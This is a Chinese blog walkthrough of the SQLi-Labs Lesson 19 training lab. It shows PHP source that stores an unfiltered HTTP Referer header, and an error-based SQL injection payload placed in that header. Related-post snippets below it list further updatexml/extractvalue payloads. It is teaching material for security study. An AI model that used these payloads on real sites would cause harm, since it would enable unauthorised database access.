SQLi Labs Lesson19

最新推荐文章于 2024-10-19 10:00:00 发布
最新推荐文章于 2024-10-19 10:00:00 发布
阅读量388 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: SQLi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/x728999452/article/details/52223857
本文介绍了一个通过Referer字段进行SQL注入的例子。在一个未对HTTP Referer字段进行过滤的登录页面中,利用特定构造的SQL语句,实现了对数据库的注入攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Lesson - 19

POST - Header Injection - Referer field - Error based


首先进入欢迎界面:


查看后台php源代码:

$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);

对username , password都进行了过滤,和上节相同。 

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
mysql_query($insert);

对Referer没有进行过滤就insert进数据库中。

所以可以利用Referer进行注入。


用TamperData在Referer后加上:

' or (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1) , '1')#

提交表单,如无成功,多次重复后,结果如图所示:


用updatexml函数,可达到相同效果。

SQL注入实例(sqli-labs/less-10)
Thewei666的博客
08-05 328
使用python脚本。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1327
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
sqli-labs19
devilare的博客
01-19 367
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sqli-labs19
jimggg的博客
03-20 336
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
Sqlilabs-19
KAKA的博客
07-09 413
19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一关对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs(19)
weixin_30615767的博客
05-27 151
百度了一下 基于错误的referer头的注入 0X01爱之初体验 猜测是基于referer头的注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
sqli-labs (less-19)
kukudeshuo的博客
03-11 444
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer头,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer头里 使用burpsuite抓包 抓包后发现,根本就没有Referer头,怎么办呢,没事,我们可以自己添加Referer头,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
sqlmap使用教程(sqli-labs1-10详解)
小同的博客
05-22 4785
-u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约浪费时间 --forms 尝试使用post注入 -r 加载文件中的HTTP请求(本地保存的请
SQLi LABS Less-19 报错注入
热门推荐
wangyuxiang946的博客
08-14 1万+
sqlilibs19SQLI-LABS第十九关,sqli-labs十九关 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
SQLI-labs-第十九关和第二十关
weixin_54055099的博客
05-20 635
Sqli-labs第十九关和二十关,http头部注入,referer、cookie注入
SQLilabs的第19关——http请求头注入(Referer)(报错注入)
qq_73393033的博客
07-22 516
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs ————less -19
Fly_鹏程万里
05-12 1142
Less-19提交一个测试数据试试:username:adminpassword:aaa由此可以看到出现了Referer,我们不妨来看看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...
sqli-labs第十九关详解
金 帛的博客
05-05 2897
sqli-labs第十九关详解
sqli-labs关卡19(基于http头部报错盲注)通关思路
zyh1588的博客
11-18 1055
小白回顾sql靶场第19
[网络安全]sqli-labs Less-19 解题详析
等风来
08-02 3912
以上为[网络安全]sqli-labs Less-19 解题详析,考察报错注入及mid函数的应用,后续将分享 [网络安全]sqli-labs Less-20 解题详析。我是秋说,我们下次见。
sqli-labs less 19 POST- Header injections - Referer field -error based
Monster1m的博客
01-25 181
一、提示referer的头注入,和上一关基本一样。先看源码呗 1.又对uname和passwd使用了check_input函数进行了过滤,所以只能找其他注入点 2.这里对uagent赋值了referer的内容而且没有进行过滤,之后只要找到哪里的数据库语句有用到uagent 3.这里发现insert语句用到了uagent,确定注入点,并且是单引号闭合。和上一关一样因为先进行了select查询,所以在注入时必须输入有效的用户名和密码 4.这里也有输出数据库错误信息,所以选择用报错注入 二、打开bp开启拦
sql-labs靶场第十九关测试报告
ccc_9wy的博客
10-19 1487
sql-labs第十九关的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;报错注入;请求头注入。
sqlilabs靶场19
最新发布
03-03
### SQLi Labs 靶场第19关介绍 在SQLi Labs靶场中,每一关都设计有不同的漏洞场景供学习者实践。对于第19关而言,重点在于理解基于布尔盲注的时间延迟攻击方法[^1]。 该关卡的目标是利用时间延迟特性来判断服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值